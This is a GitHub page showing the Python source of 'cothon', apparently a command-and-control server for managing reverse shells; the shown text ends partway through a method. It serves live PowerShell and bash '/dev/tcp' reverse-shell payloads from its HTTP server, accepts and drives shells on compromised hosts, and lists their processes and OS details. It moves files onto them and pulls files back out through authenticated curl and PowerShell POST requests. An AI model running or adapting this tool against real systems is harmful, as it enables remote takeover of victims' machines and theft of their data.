-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcothon.py
2238 lines (1909 loc) · 81.3 KB
/
cothon.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
# Coded by blue0x1 ( Chokri Hammedi )
import argparse
import base64
import concurrent.futures
import hashlib
import json
import logging
import os
import random
import re
import readline
import secrets
import select
import socket
import ssl
import sys
import threading
import time
import http.server
from datetime import datetime, timedelta
logging.basicConfig(
filename="cothon_audit.log",
level=logging.INFO,
format="%(asctime)s | %(levelname)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S"
)
RED = "\033[91m"
RESET = "\033[0m"
YELLOW = "\033[93m"
def _phoenix_await(sock: socket.socket, timeout: float) -> bytes:
sock.setblocking(0)
data = b""
begin = time.time()
while True:
if data and time.time() - begin > timeout:
break
elif time.time() - begin > timeout * 2:
break
try:
chunk = sock.recv(4096)
if chunk:
data += chunk
begin = time.time()
else:
time.sleep(0.1)
except BlockingIOError:
time.sleep(0.1)
sock.setblocking(1)
return data
def show_help():
print(r"""
Available Commands:
help Display this help message
shells List all active shells
shell <shell_id> Select a shell and enter its sub-menu
info <shell_id> Show extended information for the specified shell
interact <shell_id> Interact with a specific shell
kill <shell_id> Kill a specific shell
upload <shell_id> <local> <remote> Upload a local file to the remote path
download <shell_id> <remote> <local> Download a remote file to the local path
search <shell_id> <filename> Search for a file on the remote shell
listen <port> Start listening on the specified port for reverse shells
listeners List all active listening ports
connect <host> <port> Connect to a bind shell at the specified host and port
enum_users <shell_id> Enumerate users on the target shell (Windows/Linux)
set lhost <address> Set the local host address (C2 IP) for payloads
set hport <port> Set the HTTP server port
services <shell_id> List all active services on the target shell
run <shell_id> <command> Run a command on the target shell in the background
pwd <shell_id> Show current working directory on the target shell
ls <shell_id> [<path>] List directory contents on the target shell (optional path)
history Display the command history
exit Exit the cothon.
Dead shells are automatically removed.
""")
class ElephantGuard:
def __init__(self):
self.token_file = ".cothon_token"
self.upload_dir = "cothon_uploads"
self.rate_limits = {}
self.rate_limit_window = 60
self.rate_limit_max = 15
self.file_expiry = timedelta(hours=1)
self.init_security()
def init_security(self):
os.makedirs(self.upload_dir, mode=0o700, exist_ok=True)
if not os.path.exists(self.token_file):
token = secrets.token_urlsafe(64)
with open(self.token_file, "w") as f:
f.write(token)
os.chmod(self.token_file, 0o600)
logging.info("Generated new auth token.")
@property
def secret_token(self):
with open(self.token_file, "r") as f:
return f.read().strip()
def log_event(self, event):
logging.info(event)
def check_rate_limit(self, ip):
now = time.time()
if ip in self.rate_limits:
count, first = self.rate_limits[ip]
if now - first < self.rate_limit_window:
if count >= self.rate_limit_max:
return False
else:
self.rate_limits[ip] = (count + 1, first)
else:
self.rate_limits[ip] = (1, now)
else:
self.rate_limits[ip] = (1, now)
return True
class HostingHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, *args, lhost=None, file_store=None, lock=None, **kwargs):
self.lock = lock
self.lhost = lhost
self.file_store = file_store or {}
super().__init__(*args, **kwargs)
cfg = ElephantGuard()
def log_message(self, format, *args):
return
def validate_request(self):
client_ip = self.client_address[0]
if not self.cfg.check_rate_limit(client_ip):
self.cfg.log_event(f"RATE_LIMIT_BLOCK {client_ip}")
return False
auth_header = self.headers.get("X-Auth-Token", "")
if not secrets.compare_digest(auth_header, self.cfg.secret_token):
self.cfg.log_event(f"AUTH_FAIL {client_ip}")
return False
return True
def sanitize_path(self, raw_path):
if "/" in raw_path or "\\" in raw_path or ".." in raw_path:
return None
return os.path.join(self.cfg.upload_dir, raw_path)
def do_GET(self):
path_parts = self.path.strip('/').split('/')
if len(path_parts) >= 2 and path_parts[0] in ['windows', 'linux']:
os_type = path_parts[0]
port_str = path_parts[1]
if not port_str.isdigit():
self.send_error(404, "Invalid port")
return
listener_port = int(port_str)
if os_type == 'windows':
ps_payload = f"""
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
$c=New-Object Net.Sockets.TCPClient('{self.lhost}',{listener_port});
$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};
while(($i=$s.Read($b,0,$b.Length)) -ne 0){{
$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);
$sb=(iex $d 2>&1 | Out-String );
$sb2=$sb+'PS '+(pwd).Path+'> ';
$sbt=([text.encoding]::ASCII).GetBytes($sb2);
$s.Write($sbt,0,$sbt.Length);$s.Flush()
}};$c.Close()"""
payload_bytes = ps_payload.encode()
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', str(len(payload_bytes)))
self.end_headers()
self.wfile.write(payload_bytes)
elif os_type == 'linux':
bash_payload = f"bash -i >& /dev/tcp/{self.lhost}/{listener_port} 0>&1"
payload_bytes = bash_payload.encode()
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', str(len(payload_bytes)))
self.end_headers()
self.wfile.write(payload_bytes)
return
if not self.validate_request():
self.send_error(403, "Forbidden")
return
if self.path.startswith('/cothon_transfer/'):
file_id = self.path.split('/')[-1]
if len(file_id) != 43:
self.send_error(404, "Not Found")
return
file_entry = self.server.file_store.get(file_id)
if not file_entry:
self.send_error(404, "File Not Found")
return
if datetime.utcnow() > file_entry['expiry']:
del self.server.file_store[file_id]
self.send_error(410, "Gone")
return
content = file_entry['data']
self.send_response(200)
self.send_header('Content-Type', 'application/octet-stream')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404, "cothon Path Not Found")
def do_POST(self):
if not self.validate_request():
self.send_error(403, "Forbidden")
return
if self.path.startswith('/cothon_transfer/'):
try:
file_id = secrets.token_urlsafe(32)
content_length = int(self.headers.get("Content-Length", 0))
if content_length <= 0:
self.send_error(400, "No Content")
return
file_data = self.rfile.read(content_length)
dest = self.headers.get("X-Destination")
safe_path = None
if dest:
safe_path = self.sanitize_path(dest)
if not safe_path:
self.cfg.log_event(f"TRAVERSAL_ATTEMPT from {self.client_address[0]}: {dest}")
self.send_error(400, "Invalid filename")
return
self.server.file_store[file_id] = {
'data': file_data,
'expiry': datetime.utcnow() + self.cfg.file_expiry,
'path': safe_path
}
if safe_path:
with open(safe_path, 'wb') as f:
f.write(file_data)
self.send_response(200)
self.end_headers()
except Exception as e:
print(f"[-] POST error: {str(e)}")
self.cfg.log_event(f"UPLOAD_ERROR from {self.client_address[0]}: {str(e)}")
self.send_error(500, "Internal Server Error")
if file_id in self.server.file_store:
with self.lock:
del self.server.file_store[file_id]
else:
self.send_error(404, "cothon Path Not Found")
class SiegeTower:
def __init__(self, lhost="0.0.0.0", hport=8081, use_ssl=False):
self.cfg = ElephantGuard()
self.shells = {}
self.listeners = {}
self.lock = threading.Lock()
self.running = True
self.active_interaction = None
self.file_store = {}
self.c2_ip = lhost
self.hport = hport
self.use_ssl = use_ssl
self.http_server = None
self.http_server_thread = None
self.start_http_server()
threading.Thread(target=self._healthcheck, daemon=True).start()
self.command_history = []
self.command_tracker = {}
def start_http_server(self):
if self.http_server is not None:
self.http_server.shutdown()
self.http_server.server_close()
try:
self.http_server = http.server.HTTPServer(
('0.0.0.0', self.hport),
lambda *args: HostingHandler(*args, lhost=self.c2_ip, file_store=self.file_store, lock=self.lock)
)
self.http_server.file_store = self.file_store
if self.use_ssl:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain("cert.pem", "key.pem")
self.http_server.socket = context.wrap_socket(self.http_server.socket, server_side=True)
print(f"[+] HTTPS server: https://{self.c2_ip}:{self.hport}")
else:
print(f"[+] HTTP server: http://{self.c2_ip}:{self.hport}")
self.http_server.progress_callback = self.progress_
threading.Thread(target=self.http_server.serve_forever, daemon=True).start()
except OSError as e:
print(f"[-] HTTP/HTTPS server failed: {e}")
def _start_listener(self, port: int):
with self.lock:
if port in self.listeners:
print(f"[-] Already listening on port {port}")
return
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
sock.listen(5)
except OSError as e:
print(f"[-] Could not listen on port {port}: {e}")
return
def listener_thread(sock, port):
print(f"[*] cothon active on port {port}")
while self.running:
try:
conn, addr = sock.accept()
threading.Thread(target=self._shell, args=(conn, addr), daemon=True).start()
except Exception:
break
sock.close()
print(f"[*] Listener on port {port} closed.")
thread = threading.Thread(target=listener_thread, args=(sock, port), daemon=True)
thread.start()
with self.lock:
self.listeners[port] = {"thread": thread, "socket": sock}
def _stop_listener(self, port: int):
with self.lock:
if port not in self.listeners:
print(f"[-] No active listener on port {port}")
return
listener = self.listeners[port]
sock = listener["socket"]
sock.close()
del self.listeners[port]
print(f"[+] Listener on port {port} stopped.")
def list_listeners(self):
with self.lock:
if not self.listeners:
print("[-] No active listeners.")
return
print("Active listeners on ports:")
for port in self.listeners:
print(f" - {port}")
def list_shells(self):
with self.lock:
if not self.shells:
print("\n[-] No active shells")
return
columns = [
("ID", 6),
("OS", 10),
("User", 30),
("Status", 8),
("BG/FG", 10),
("Address", 23),
("Connected", 19)
]
top_border = "┌" + "┬".join("─" * width for _, width in columns) + "┐"
header_row = "│" + "│".join(col.center(width) for col, width in columns) + "│"
sep_border = "├" + "┼".join("─" * width for _, width in columns) + "┤"
bottom_border = "└" + "┴".join("─" * width for _, width in columns) + "┘"
print()
print(top_border)
print(header_row)
print(sep_border)
for sid, shell in self.shells.items():
user_info = shell.get('user_info', "unknown/unknown")
is_elevated = shell.get('is_elevated', False)
if "root" in user_info.lower() or "system" in user_info.lower():
row_color = RED
elif is_elevated:
row_color = YELLOW
else:
row_color = RESET
row_data = [
str(sid),
shell['type'],
user_info,
"Active" if shell['active'] else "Dead",
"Foreground" if not shell['background'] else "Background",
f"{shell['address'][0]}:{shell['address'][1]}",
shell.get("connected_time", "")
]
row_str = row_color + "│" + "│".join(val.ljust(width) for (_, width), val in zip(columns, row_data)) + "│" + RESET
print(row_str)
print(bottom_border)
def connect_bind_shell(self, host: str, port: int):
try:
s = socket.socket()
s.connect((host, port))
except Exception as e:
print(f"[-] Could not connect to {host}:{port}: {e}")
return
shell_id = random.randint(1000, 9999)
shell_type = self._shell_type(s)
connected_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
user_info, is_elevated = self._user_info(s, shell_type)
with self.lock:
self.shells[shell_id] = {
'socket': s,
'address': (host, port),
'active': True,
'background': False,
'type': shell_type,
'connected_time': connected_time,
'user_info': user_info,
'is_elevated': is_elevated,
'os_version': None
}
print(f"[+] Connected to bind shell: ID {shell_id} ({shell_type}) at {host}:{port} \r")
def _shell(self, conn: socket.socket, addr: tuple):
shell_id = random.randint(1000, 9999)
shell_type = self._shell_type(conn)
connected_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
user_info, is_elevated = self._user_info(conn, shell_type)
if shell_type == "Windows":
conn.sendall(b"cmd /c cd\n")
else:
conn.sendall(b"pwd\n")
output = ""
end_time = time.time() + 5
conn.settimeout(2)
while time.time() < end_time:
try:
data = conn.recv(4096).decode(errors="replace")
if not data:
break
output += data
if shell_type == "Windows" and ">" in data:
break
elif shell_type == "Linux" and ("$ " in data or "# " in data):
break
except (socket.timeout, BlockingIOError):
continue
if shell_type == "Windows":
current_dir = output.splitlines()[0].strip()
else:
current_dir = output.splitlines()[0].strip()
with self.lock:
self.shells[shell_id] = {
'socket': conn,
'address': addr,
'active': True,
'background': False,
'type': shell_type,
'connected_time': connected_time,
'user_info': user_info,
'is_elevated': is_elevated,
'os_version': None,
'current_dir': current_dir
}
print(f"\n[+] New shell: ID {shell_id} ({shell_type}) from {addr} \r")
def _shell_type(self, conn: socket.socket) -> str:
try:
conn.settimeout(0.5)
try:
while True:
data = conn.recv(65535)
if not data:
break
except (socket.timeout, BlockingIOError):
pass
finally:
conn.settimeout(None)
try:
conn.sendall(b'\n')
except Exception as e:
return f"Unknown (Send Error: {e})"
linux_command = b"echo __OS__$(uname -s)__\n"
try:
conn.sendall(linux_command)
linux_out = _phoenix_await(conn, 2).strip().lower()
except Exception:
linux_out = b""
if b"__os__linux" in linux_out:
return "Linux"
windows_command = b'cmd /c "echo __OS__%OS%__"\n'
try:
conn.sendall(windows_command)
win_out = _phoenix_await(conn, 2).strip().lower()
except Exception:
win_out = b""
if b"__os__windows_nt" in win_out or b"__os__windows" or b"powershell" in win_out or b"$" in win_out:
return "Windows"
if linux_out and b"linux" in linux_out:
return "Linux"
if win_out and (b"windows" in win_out or b"microsoft" in win_out):
return "Windows"
return "Unknown"
except Exception as e:
return f"Unknown ({str(e)})"
finally:
try:
conn.settimeout(None)
except:
pass
def _exec_ps(self, shell_id: int):
def _execute():
try:
with self.lock:
if shell_id not in self.shells or not self.shells[shell_id]['active']:
print(f"[-] Shell {shell_id} is either dead or inactive")
return
shell = self.shells[shell_id]
shell['command_running'] = True
self.command_tracker[shell_id] = time.time()
conn = shell['socket']
shell_type = shell['type']
conn.settimeout(30)
if shell_type == "Windows":
ps_command = "cmd /c tasklist /V /FO LIST\n"
else:
ps_command = "ps aux -ww\n"
conn.sendall(ps_command.encode())
hb_thread = threading.Thread(target=self._send_heartbeats, args=(shell_id,), daemon=True)
hb_thread.start()
output = b''
start_time = time.time()
while time.time() - start_time < 25:
try:
chunk = conn.recv(4096)
if not chunk:
break
output += chunk
if (shell_type == "Windows" and b'>' in chunk) or \
(shell_type == "Linux" and b'$ ' in chunk):
break
except (socket.timeout, BlockingIOError):
continue
if shell_type == "Windows":
self._windows_ps(output.decode('utf-8', errors='replace'))
else:
self._linux_ps(output.decode('utf-8', errors='replace'))
except Exception as e:
print(f"[-] PS command failed: {str(e)}")
finally:
with self.lock:
if shell_id in self.shells:
self.shells[shell_id]['command_running'] = False
self.command_tracker.pop(shell_id, None)
try:
conn.settimeout(None)
except:
pass
threading.Thread(target=_execute, daemon=True).start()
print(f"[*] Tasked {shell_id} shell to list processes")
def _windows_ps(self, raw_data):
processes = []
current_proc = {}
SYSTEM_PROCESSES = {
"system idle process", "system", "smss.exe", "csrss.exe",
"wininit.exe", "services.exe", "lsass.exe", "winlogon.exe",
"registry", "lsm.exe", "dwm.exe", "svchost.exe",
"taskhost.exe", "conhost.exe", "spoolsv.exe", "atieclxx.exe",
"taskeng.exe", "msmpeng.exe", "dllhost.exe", "ctfmon.exe",
"csrss.exe", "smss.exe", "wininit.exe", "services.exe"
}
SYSTEM_USERS = {
"system", "local service", "network service",
"nt authority\\system", "nt authority\\local service",
"nt authority\\network service"
}
try:
for line in raw_data.splitlines():
line = line.strip()
if not line:
if current_proc:
processes.append(current_proc)
current_proc = {}
continue
if ':' in line:
key, val = line.split(':', 1)
key = key.strip().replace(' ', '_').replace('#', 'Num')
current_proc[key.lower()] = val.strip()
if current_proc:
processes.append(current_proc)
filtered = []
for p in processes:
try:
pid = int(p.get('pid', '0'))
name = p.get('image_name', '').lower()
user = p.get('user_name', '').lower()
is_system_process = (
name in SYSTEM_PROCESSES or
any(user.startswith(sys_user) for sys_user in SYSTEM_USERS) or
pid <= 4
)
if not is_system_process:
filtered.append(p)
except Exception:
continue
if not filtered:
print(f"{YELLOW}\n[+] No userland processes detected{RESET}")
return
def mem_to_mb(mem_str):
try:
return f"{int(mem_str.replace(',', '').replace(' K', '')) // 1024}MB"
except:
return mem_str
print(f"\n[*] Process List")
print("-" * 100)
print(f"{'PID':<8}{'PROCESS':<20}{'USER':<22}{'MEM':<10}{'CPU':<10}")
for p in filtered[:25]:
print(
f"{p.get('pid', '?')[:8]:<8}"
f"{p.get('image_name', '?')[:18]:<20}"
f"{self._sanitize_user(p.get('user_name', 'SYSTEM'))[:20]:<22}"
f"{mem_to_mb(p.get('mem_usage', '0K'))[:10]:<10}"
f"{p.get('cpu_time', '0:00:00')[:10]:<10}"
)
except Exception as e:
print(f"{RED}\n[!] PROCESS INTEL FAILED: {str(e)}{RESET}")
def _sanitize_user(self, user):
return user.split('\\')[-1] if '\\' in user else user
def _linux_ps(self, raw_data):
print(f"\n[*] Process List")
print("-" * 120)
print(f"{'PID':<8}{'USER':<12}{'%CPU':<6}{'%MEM':<6}{'COMMAND':<50}")
header_skipped = False
threat_detected = False
for line in raw_data.splitlines():
if not line.strip() or line.startswith(' PID') or ']' in line:
continue
parts = re.split(r'\s+', line.strip(), maxsplit=10)
if len(parts) < 11:
continue
pid, user, cpu, mem = parts[1], parts[0], parts[2], parts[3]
cmd = ' '.join(parts[10:])
if pid < "100" or cmd.startswith('['):
continue
alert_color = RESET
if any(x in cmd for x in ['nc ', 'ncat ', 'socat ', 'reverse_']):
alert_color = RED
threat_detected = True
elif 'python' in cmd and ('http.server' in cmd or 'socket' in cmd):
alert_color = YELLOW
threat_detected = True
print(f"{pid:<8}{user[:12]:<12}{cpu:<6}{mem:<6}{alert_color}{cmd[:60]}{RESET}")
if not threat_detected:
print(f"{YELLOW}\n[!] Clean systems are boring. No threats detected.{RESET}")
def _os_version(self, conn: socket.socket, shell_type: str) -> str:
try:
if shell_type == "Linux":
cmd = "uname -sr\n"
conn.settimeout(7)
conn.sendall(cmd.encode())
data = _phoenix_await(conn, 7).decode(errors="replace").strip()
conn.settimeout(None)
return data if data else "Not detected"
elif shell_type == "Windows":
commands = [
'cmd /c ver\n',
'cmd /c systeminfo | findstr /B /C:"OS Name:" /C:"OS Version:"\n'
]
results = []
conn.settimeout(10)
for cmd in commands:
try:
conn.sendall(cmd.encode())
block = ""
end_time = time.time() + 10
while time.time() < end_time:
try:
data = conn.recv(4096)
if data:
decoded = data.decode(errors="replace")
block += decoded
if "Microsoft Windows" in decoded or "OS Name:" in decoded:
break
else:
break
except BlockingIOError:
time.sleep(0.1)
results.append(block.strip())
except socket.timeout:
results.append("[ERROR] Timed out while retrieving OS information.")
continue
conn.settimeout(None)
combined = "\n".join(results)
for line in combined.splitlines():
if "Microsoft Windows" in line or "OS Name:" in line:
return line.strip()
return "Windows (Version detection failed)"
else:
return "Unknown OS"
except socket.timeout:
return "Error: Connection timed out"
except Exception as e:
return f"Error: {e}"
def upload_artifact(self, conn: socket.socket, shell_type: str, local_path: str, remote_path: str) -> bool:
try:
file_id = secrets.token_urlsafe(32)
if not os.path.isfile(local_path):
print(f"[-] Local file '{local_path}' not found.")
return False
with open(local_path, "rb") as f:
file_data = f.read()
from datetime import datetime
expiry_time = datetime.utcnow() + self.cfg.file_expiry
self.file_store[file_id] = {
"data": file_data,
"expiry": expiry_time
}
protocol = "https" if getattr(self, "use_ssl", False) else "http"
upload_url = f"{protocol}://{self.c2_ip}:{self.hport}/cothon_transfer/{file_id}"
auth_token = self.cfg.secret_token
if shell_type == "Windows":
ps_command = (
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
f"$wc=New-Object Net.WebClient; "
f"$wc.Headers.Add('X-Auth-Token','{auth_token}'); "
f"$wc.DownloadFile('{upload_url}','{remote_path}')"
)
cmd = f'powershell -Command "{ps_command}"'
else:
cmd = (
f"curl -k -s -H 'X-Auth-Token: {auth_token}' '{upload_url}' -o '{remote_path}'"
)
conn.sendall(cmd.encode() + b"\n")
return self._verify_transfer(conn, remote_path, shell_type)
except Exception as e:
print(f"[-] upload_artifact error: {e}")
return False
finally:
pass
def download_artifact(self, conn: socket.socket, shell_type: str, remote_path: str, local_path: str) -> bool:
try:
file_id = secrets.token_urlsafe(32)
auth_token = self.cfg.secret_token
protocol = "https" if getattr(self, "use_ssl", False) else "http"
upload_url = f"{protocol}://{self.c2_ip}:{self.hport}/cothon_transfer/{file_id}"
safe_local = os.path.basename(local_path)
if shell_type == "Windows":
ps_command = (
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
f"Invoke-WebRequest -Uri '{upload_url}' -Method POST "
f"-Headers @{{'X-Auth-Token'='{auth_token}'; 'X-Destination'='{safe_local}'}} "
f"-Body (Get-Content -Path '{remote_path}' -Raw) "
)
cmd = f'powershell -Command "{ps_command}"'
else:
cmd = (
f"curl -k -s -X POST "
f"-H 'X-Auth-Token: {auth_token}' "
f"-H 'Content-Type: application/octet-stream' "
f"-H 'X-Destination: {safe_local}' "
f"--data-binary @{remote_path} '{upload_url}'"
)
conn.sendall(cmd.encode() + b"\n")
time.sleep(2)
return True
except Exception as e:
print(f"[-] download_artifact error: {e}")
return False
def _verify_transfer(self, conn: socket.socket, remote_path: str, shell_type: str) -> bool:
try:
if shell_type == "Windows":
verify_cmd = f'powershell -Command "if (Test-Path \'{remote_path}\') {{echo UPLOAD_SUCCESS}} else {{echo UPLOAD_FAIL}}"'
else:
verify_cmd = f"test -f '{remote_path}' && echo UPLOAD_SUCCESS || echo UPLOAD_FAIL"
conn.sendall(f"{verify_cmd}\n".encode())
response = _phoenix_await(conn, 5).decode(errors="replace").strip()
return "UPLOAD_SUCCESS" in response
except Exception as e:
print(f"[-] Upload verification failed: {e}")
return False
def cmd_upload(self, cmd: str):
parts = cmd.split(maxsplit=3)
if len(parts) != 4:
print("Usage: upload <shell_id> <local_path> <remote_path>")
return
_, sid_str, local_path, remote_path = parts
try:
shell_id = int(sid_str)
except ValueError:
print("Usage: upload <shell_id> <local_path> <remote_path>")
return
with self.lock:
shell = self.shells.get(shell_id)
if not shell:
print(f"[-] Shell ID {shell_id} not found.")
return
if not shell['active']:
print(f"[-] Shell {shell_id} is dead or inactive.")
return
if not shell['background'] and self.active_interaction == shell_id:
print("[-] This shell is in the foreground. Type 'bg' inside the shell first.")
return
if not os.path.isfile(local_path):
print(f"[-] Local file '{local_path}' not found.")
return
shell_type = shell['type']
conn = shell['socket']
print(f"[+] Uploading '{local_path}' to '{remote_path}' on shell {shell_id}...")
success = self.upload_artifact(conn, shell_type, local_path, remote_path)
if success:
print("[+] Upload completed successfully.")
else:
print("[-] Upload failed or incomplete.")
def cmd_download(self, cmd: str):
parts = cmd.split(maxsplit=3)
if len(parts) != 4:
print("Usage: download <shell_id> <remote_path> <local_path>")
return
_, sid_str, remote_path, local_path = parts
try:
shell_id = int(sid_str)
except ValueError:
print("Usage: download <shell_id> <remote_path> <local_path>")
return
with self.lock:
shell = self.shells.get(shell_id)
if not shell:
print(f"[-] Shell ID {shell_id} not found.")
return
if not shell['active']:
print(f"[-] Shell {shell_id} is dead or inactive.")
return
shell_type = shell['type']
conn = shell['socket']
print(f"[+] Downloading '{remote_path}' to '{local_path}' from shell {shell_id}...")
success = self.download_artifact(conn, shell_type, remote_path, local_path)
time.sleep(1)
if success:
print("[+] Download completed successfully.")
else:
print("[-] Download failed or incomplete.")
def _armored_wait(self, conn, timeout, get_output=False, shell_type=None, expect=None):
start = time.time()
buffer = b''
markers = {
'init': {'Windows': b'cothon_init_ok', 'Linux': b'cothon_init_ok'},
'verify': {'Windows': b'cothon_verify_ok', 'Linux': b'cothon_verify_ok'},
'chunk': {'Windows': b'cothon_chunk_ok', 'Linux': b'cothon_chunk_ok'},
'md5': {'Windows': b'cothon_md5_done', 'Linux': b'cothon_md5_done'},
'hash': {'Windows': b'cothon_md5_done', 'Linux': b'cothon_md5_done'},
'size': {'Windows': b'cothon_size_done', 'Linux': b'cothon_size_done'},
'keepalive': {'Windows': b'KEEPALIVE', 'Linux': b'KEEPALIVE'}
}
while time.time() - start < timeout:
try:
data = conn.recv(4096)
if not data:
break
buffer += data
if expect and shell_type:
target = markers.get(expect, {}).get(shell_type)
if target and target in buffer:
if get_output:
return buffer.decode(errors='replace')
return True
errors = [b'rror', b'xception', b'denied', b'not found']
if any(e in buffer for e in errors):
print(f"\n[!] Shell error: {buffer.decode(errors='replace')}")
return False
if shell_type == "Windows" and not get_output and buffer.endswith((b'PS ', b'> ')):
return True
except (socket.timeout, BlockingIOError):
continue
if get_output:
return buffer.decode(errors='replace').strip()
return False
def progress_(self, sent: int, total: int):
percent = sent / total
bar_length = 30
filled_blocks = int(bar_length * percent)
bar = f"[{'█' * filled_blocks}{'░' * (bar_length - filled_blocks)}] {percent:.1%} ({sent / 1024:.2f} KB / {total / 1024:.2f} KB)"
sys.stdout.write(f"\r{bar}")
sys.stdout.flush()
if sent >= total:
sys.stdout.flush()
def interact_(self, shell_id: int):
with self.lock:
if self.active_interaction is not None and self.active_interaction != shell_id:
print("[-] Another session is currently active. Use 'bg' to background it first.")
return
shell = self.shells.get(shell_id)
if not shell:
print(f"[-] Shell ID {shell_id} not found")
return
if not shell['active']:
print(f"[-] Shell {shell_id} is Dead or closed.")
return